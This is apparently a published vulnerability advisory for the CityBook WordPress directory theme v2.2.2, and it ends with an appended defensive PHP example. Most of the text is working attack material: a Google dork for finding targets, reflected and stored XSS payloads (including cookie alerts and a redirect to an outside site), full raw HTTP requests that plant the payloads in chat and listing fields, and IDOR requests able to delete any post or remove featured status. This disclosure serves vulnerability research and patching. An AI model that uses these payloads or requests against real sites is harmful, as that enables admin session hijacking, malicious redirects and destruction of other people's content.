CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities

2019.12.27
m0ze (RU)
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: CityBook - Directory & Listing WordPress Theme v2.2.2 Multiple Vulnerabilities
# Google Dork: /wp-content/themes/citybook/
# Date: 27/12/2019
# Exploit Author: m0ze
# Vendor Homepage: https://cththemes.com/
# Software Link: https://themeforest.net/item/citybook-directory-listing-wordpress-theme/21694727
# Version: 2.2.2
# Tested on: Parrot OS
# CWE: 79

----[]- Info: -[]----

Demo website: https://citybook2.cththemes.com/

----[]- Reflected XSS: -[]----

The input field with the placeholder «What are you looking for?» on the homepage is vulnerable. Any payload is triggered three times if "> is placed in front of it. The same applies to the regular search (the block near the website logo).

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: <img src=x onerror=alert(document.domain)>
Payload Sample #2: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC #0: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.cookie%29%3E&location_search&nearby=off&address_lat&address_lng&distance=10&lcats%5B%5D=
PoC #1: https://citybook2.cththemes.com/?search_term=%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
PoC #2: https://citybook2.cththemes.com/?search_term=%22%3E%3Cimg+src%3Dx+onerror%3Dwindow.location%3D%60https%3A%2F%2Fm0ze.ru%60%3B%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=

----[]- Persistent XSS -> Chat: -[]----

Any cookie-stealing payload can be used to hijack a user or administrator session, or to force a redirect to a malicious website (from https://citybook2.cththemes.com/dashboard/?dashboard=chats or from the chat widget in the bottom right corner).

Payload Sample #0: <img src=x onerror=alert(`m0ze`)>
Payload Sample #1: <img src=x onerror=window.location=`https://m0ze.ru`;>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=chats
Cookie: _your_auth_cookies_here_

action=citybook_addons_chat_reply&_nonce=x75ac6299d&cid=1020&user_id=XXX&touid=1&reply_text=_payload_

Where:
user_id=XXX (your unique WordPress ID);
touid=1 (message receiver ID, in this example ID 1 == account «admin»);
reply_text=_payload_ (your payload text).

----[]- Persistent Self-XSS -> Profile: -[]----

Vulnerable input fields: «Phone» and «Address» (triggered only on the https://citybook2.cththemes.com/dashboard/?dashboard=profile page for the current user).

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

----[]- Persistent XSS -> Listing page: -[]----

Add a new listing at https://citybook2.cththemes.com/submit/ (the first time you need to order the «Free» plan and then open this URL again).

Vulnerable input fields: «Listing Address», «Listing Latitude», «Listing Longitude», «Email Address», «Description».
«Trainers» section: the «Add Member» option has vulnerable «Name», «Job or Position» and «Description» input fields.
«Additional Services Fees» section: the «Add Service» option has a vulnerable «Service Name» input field.

The «Listing Address» payload also fires on the admin dashboard, so it is possible to steal administrator cookies.

Payload Sample #0: "><img src=x onerror=alert(document.cookie)>
Payload Sample #1: "><h1>Greetings from m0ze</h1>
Payload Sample #2: "><script>alert(`PoC`);</script>

PoC:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------18467633426500
Content-Length: 5848
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/edit-listing/?listing_id=XXXX
Cookie: _your_auth_cookies_here_

-----------------------------18467633426500
Content-Disposition: form-data; name="lid"

XXXX
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_type_id"

4901
-----------------------------18467633426500
Content-Disposition: form-data; name="isSubmit"

true
-----------------------------18467633426500
Content-Disposition: form-data; name="hasError"

false
-----------------------------18467633426500
Content-Disposition: form-data; name="title"

PoC
-----------------------------18467633426500
Content-Disposition: form-data; name="content"

<p><h1 style="font-size:68px;background:black;color:red;">Greetings from m0ze</h1></p>
-----------------------------18467633426500
Content-Disposition: form-data; name="thumbnail[0]"

-----------------------------18467633426500
Content-Disposition: form-data; name="cats[0]"

50
-----------------------------18467633426500
Content-Disposition: form-data; name="tags"

-----------------------------18467633426500
Content-Disposition: form-data; name="locations"

US|
-----------------------------18467633426500
Content-Disposition: form-data; name="features[0]"

64
-----------------------------18467633426500
Content-Disposition: form-data; name="features[1]"

84
-----------------------------18467633426500
Content-Disposition: form-data; name="features[2]"

66
-----------------------------18467633426500
Content-Disposition: form-data; name="features[3]"

76
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[timezone]"

America/New_York
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Monday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Tuesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Wednesday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Thursday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Friday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Saturday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="working_hours[Sunday][static]"

enterHours
-----------------------------18467633426500
Content-Disposition: form-data; name="ltags_names"

m0ze
-----------------------------18467633426500
Content-Disposition: form-data; name="post_excerpt"

"><h1>Greetings from m0ze</h1>
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_address"

<!--<img src="--><img src=x onerror=(alert)(`m0zeAddr`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_latitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLat`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_longitude"

<!--<img src="--><img src=x onerror=(alert)(`m0zeLng`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="gmap"

-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_email"

<!--<img src="--><img src=x onerror=(alert)(`m0ze`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_phone"

-----------------------------18467633426500
Content-Disposition: form-data; name="contact_infos_website"

-----------------------------18467633426500
Content-Disposition: form-data; name="price_range"

moderate
-----------------------------18467633426500
Content-Disposition: form-data; name="price_from"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="price_to"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates"

-----------------------------18467633426500
Content-Disposition: form-data; name="listing_dates_show_metas"

-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_id]"

--imgsrc---imgsrcxonerroralertm0ze88-
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_name]"

<!--<img src="--><img src=x onerror=(alert)(`ServiceName`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_desc]"

-----------------------------18467633426500
Content-Disposition: form-data; name="lservices[0][service_price]"

-
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][name]"

<!--<img src="--><img src=x onerror=(alert)(`Membername`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][job]"

<!--<img src="--><img src=x onerror=(alert)(`MemberJob`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="lmember[0][desc]"

<!--<img src="--><img src=x onerror=(alert)(`MemberDesc`)//">
-----------------------------18467633426500
Content-Disposition: form-data; name="action"

submit_listing
-----------------------------18467633426500
Content-Disposition: form-data; name="_wpnonce"

02b218f88a
-----------------------------18467633426500--

----[]- IDOR #0: -[]----

Delete any post/page/listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 84
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_auth_cookies_here_

lid=XXXX&action=citybook_addons_delete_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee

Where:
lid=XXXX (page/post/listing unique WordPress ID; it can be discovered from the page class on the <body> tag).

----[]- IDOR #1: -[]----

Remove the «Featured» option for any listing:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: citybook2.cththemes.com
User-Agent: Mozilla/5.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 101
Origin: https://citybook2.cththemes.com
DNT: 1
Connection: close
Referer: https://citybook2.cththemes.com/dashboard/?dashboard=listings
Cookie: _your_auth_cookies_here_

lid=XXXX&lfeatured=true&action=citybook_addons_featured_listing&_nonce=xxb1891cee&_wpnonce=xxb1891cee

Where:
lid=XXXX (page/post/listing unique WordPress ID; it can be discovered from the page class on the <body> tag).
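The two root causes above (unescaped output of search_term and other user-controlled fields; AJAX handlers that act on any lid with only a nonce and no per-object authorization check) are avoided in a WordPress theme as shown in this added defensive example. It is not the CityBook theme's own code: the action name citybook_addons_delete_listing and the lid / _nonce parameters come from the advisory, while the nonce action string 'citybook_delete_listing' and the 'listing' post type are assumed placeholders.

```php
<?php
// Added example, not the theme's code. Placeholders: the nonce action
// 'citybook_delete_listing' and the post type 'listing' are assumptions.

// 1) Reflected XSS: escape for the context the value lands in. esc_attr()
//    encodes " and > so a "><img ...> value stays inside the attribute
//    as literal text instead of closing it and starting a new tag.
function citybook_safe_search_field() {
    $term = isset( $_GET['search_term'] )
        ? sanitize_text_field( wp_unslash( $_GET['search_term'] ) )
        : '';
    return '<input type="text" name="search_term" value="'
        . esc_attr( $term ) . '" placeholder="What are you looking for?">';
}

// 2) IDOR: a nonce only proves the request came from a page the logged-in
//    user rendered; it says nothing about which listing that user may touch.
//    The delete handler must also ask WordPress whether THIS user may delete
//    THIS post, which current_user_can( 'delete_post', $id ) answers using
//    the post's author and the user's role (authors: own posts only;
//    administrators: any post; subscribers: none).
function citybook_safe_delete_listing() {
    check_ajax_referer( 'citybook_delete_listing', '_nonce' ); // 403 and exit on failure

    $lid = isset( $_POST['lid'] ) ? absint( $_POST['lid'] ) : 0;
    if ( ! $lid || get_post_type( $lid ) !== 'listing' ) {
        wp_send_json_error( 'invalid listing id', 400 );
    }

    if ( ! current_user_can( 'delete_post', $lid ) ) {
        wp_send_json_error( 'not allowed', 403 );
    }

    wp_trash_post( $lid );
    wp_send_json_success( array( 'deleted' => $lid ) );
}
add_action( 'wp_ajax_citybook_addons_delete_listing', 'citybook_safe_delete_listing' );
// No wp_ajax_nopriv_ hook: unauthenticated callers never reach the handler.
```

The same pattern applies to citybook_addons_featured_listing (check edit_post on the lid) and to the stored fields in the listing and chat forms, which must be escaped with esc_html() or esc_attr() at output time rather than trusted from the database. The dashboard must emit the matching nonce with wp_create_nonce( 'citybook_delete_listing' ) for the handler to accept it.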

